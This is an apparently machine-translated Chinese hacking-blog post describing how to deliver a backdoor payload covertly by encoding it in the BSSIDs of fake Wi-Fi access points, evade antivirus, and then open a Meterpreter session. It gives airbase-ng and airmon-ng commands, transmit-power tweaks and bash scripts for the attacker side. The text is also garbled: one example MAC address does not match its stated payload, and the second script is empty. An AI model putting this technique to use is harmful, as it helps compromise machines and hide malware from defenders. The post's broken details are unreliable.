根据无线流量和BSSID传送后门有效载荷

黑客信息网

在本文中,我觉得聊一聊无线网络AP和BSSID(AP的MAC地址)。大家的后门有效载荷沒有开展系统文件数据加密和硬编码,因而我们可以运用这类方式绕开电脑杀毒软件。大家的Meterpreter 有效载荷在数据流量中传送。

在这类状况下,网络攻击能够根据伪造BSSID(环城路变更,伪造AP)和逐渐将后门有效载荷引入到BSSID(伪造的AP的MAC地址)启动进攻。在手机客户端,被感染的系统软件(后门系统软件)能够根据在AIR上扫描仪AP的MAC地址(BSSID)来转储这种有效载荷,不用根据user-pass联接到伪造的AP。根据Wifi机器设备传送有效载荷,比如wlan(无线流量)也在我的探讨范畴以内。在AIR上扫描仪BSSID 转储有效载荷后,Meterpreter对话根据Ethernet Network创建(沒有Wifi 或是无线网络设备)。

恶意程序编码或简易的后门编码能够运用WIFI机器设备传送或是转储有效载荷,比如Wlan,最终你将获得有简易C#编码的 meterpreter 对话。

在本文中,我应用Wifi机器设备只是是传送有效载荷(步骤1),根据扫描仪Wifi机器设备MAC地址(BSSID) 转储这种有效载荷,随后我的后门将根据eth0或Ethernet卡创建Meterpreter 对话,因而在这个环节(步骤2),大家应用数据流量来创建Meterpreter 对话,不应用WIFI机器设备,。

留意:假如你要只根据WIFI机器设备来进行步骤1和步骤2,我觉得技术性上是行得通的,可是自己沒有检测过。在步骤2中你很有可能会必须采用EvilTwin AP,还必须使Meterpreter Listener在伪造的AP互联网子网中有一个IP地址,你能应用MANA-Toolkit来进行这一实际操作。

连接:

这一方式的关键是啥

关键是:恶意程序或后门有效载荷引入到WiFi机器设备的BSSID,及其根据无线流量传送是很有可能的。

从伪造的AP扫描仪引入的有效载荷到BSSID,步骤以下

比如我们要传送下列的有效载荷:

“fec9a00011ddc00945f1”

步骤1:网络攻击系统软件将伪造的AP取名为“Fake”,MAC地址为00:fe:c8:b0:00:11

留意:Mac详细地址00:fe:c8:b0:00:11是引入的有效载荷,因此大家的有效载荷是“fec9a00011”,是有效载荷“fec9a00011ddc00945f1”的上半部分。

步骤2:后门系统软件扫描仪Essid“Fake”并转储BSSID

留意:你的后门编码应当转储这些的BSSID或Mac详细地址fe:c8:b0:00:11==> fec9a00011

步骤3:网络攻击系统软件将伪造的AP取名为“Fake”,Mac详细地址是00:dd:c0:09:45:f1

留意:Mac详细地址00:dd:c0:09:45:f1是引入的有效载荷,因此大家的有效载荷是“ddc00945f1”,是有效载荷 “fec9a00011ddc00945f1”的下半一部分。

步骤4:后门系统软件扫描仪Essid“Fake”并转储BSSID

留意:你的后门编码应当转储这些的BSSID或Mac详细地址dd:c0:09:45:f1==> ddc00945f1

这2步扫描仪以后,在被感染的系统软件(后门系统软件)中你可能获得有效载荷 fec9a00011ddc00945f1。

如今你了解了这类方式的原理,下面我将根据在linux端命令向你展现(步骤1和步骤3)大量的信息内容。下边我将根据命令伪造AP。

可选命令:在建立Wlan0Mon以前变更WiFi卡的TXPower,这种命令能够协助你更强的伪造AP数据信号,便于你能手动式实际操作此命令。

ifconfig wlan0 down

iw reg set BO

ifconfig wlan0 up

iwconfig wlan0 txpower 30

留意:这种命令在根据airmon-ng建立Wlan0Mon以前就该应用,这种命令是可选择的,并不是必不可少的。

应用WLAN卡的监管方式是伪造AP的关键步骤

你能应用命令“airmon-ng start wlan0”为Wlan0建立“Wlan0Mon”监管方式。

留意:你能手动式运作此命令,或是能够在script1.sh文件中应用此命令,如步骤(cmd 1-1)。在文中中,我还在网络攻击端手动式运作此命令。

步骤1:网络攻击系统软件将伪造的AP取名为“Fake”,MAC地址为00:fe:c8:b0:00:11。

留意:Mac详细地址00:fe:c8:b0:00:11是引入的有效载荷,因此大家的有效载荷是“fec9a00011”

cmd 1-1:airmon-ng start wlan0

留意:建立Wlan0Mon(监管方式)

cmd 1-2:airbase-ng -a 00:fe:c8:b0:00:11 -essid“Fake”-I 10 -0 wlan0Mon

留意:你需要15秒伪造AP,15秒后你能根据killall命令在cmd 1-2停止这一命令。

cmd 1-3:sleep 15

cmd 1-4:killall airbase-ng

步骤3:网络攻击系统软件将伪造的AP取名为“Fake”,MAC地址为00:dd:c0:09:45:f1

留意:Mac详细地址00:dd:c0:09:45:f1是引入的有效载荷,因此大家的有效载荷是“ddc00945f1”

cmd 3-1:airbase-ng -a 00:dd:c0:09:45:f1 -essid“Fake”-I 10 -0 wlan0Mon

留意:你需要15秒伪造AP,15秒后你能根据killall命令在cmd 3-1停止这一命令。cmd 3-2:sleep 15

cmd 3-3:killall airbase-ng

你能见到在执行这种步骤的情况下,大家必须应用之上命令,可是我还在airbase-ng命令上碰到了问题。

难题及其解决方法

难题出現在步骤(cmd 1-2)到(cmd 1-3)。

在步骤(cmd 1-2)以后,仅有根据ctrl c或kill能停止airbaseng命令,所以我的bash脚本制作一直停在步骤(cmd 1-2),直至我停止了过程。

对于这个问题,我的解决方法是应用2 个bash脚本文件:

第一个bash脚本文件是 “Script1.sh”, 应用于步骤(cmd 1-2和cmd 3-1)

留意:你能在bash脚本制作的第一行中加上步骤(cmd 1-1)或手动式实行。在文中中,我手动式实行cmd 1-1。

第二个bash脚本制作是 “Script2.sh”,应用于步骤(cmd 1-3 & cmd 1-4 & cmd 3-2 & cmd 3-3)

因此在这类状况下,大家应当最先运作bash脚本制作“Script1.sh”,随后马上或2-3秒后运作bash脚本制作“Script2.sh”。

大家获得下列的文档:

Script1.sh文件:

#!/ bin / bash

airbase-ng -a 00:fe:c8:b0:00:11 -essid“Fake”-I 10 -0 wlan0Mon;

airbase-ng -a 00:dd:c0:09:45:f1 -essid“Fake”-I 10 -0 wlan0Mon;

Script2.sh文件:

#!/bin/bash

标签:

发表评论 (已有条评论)

  • 评论列表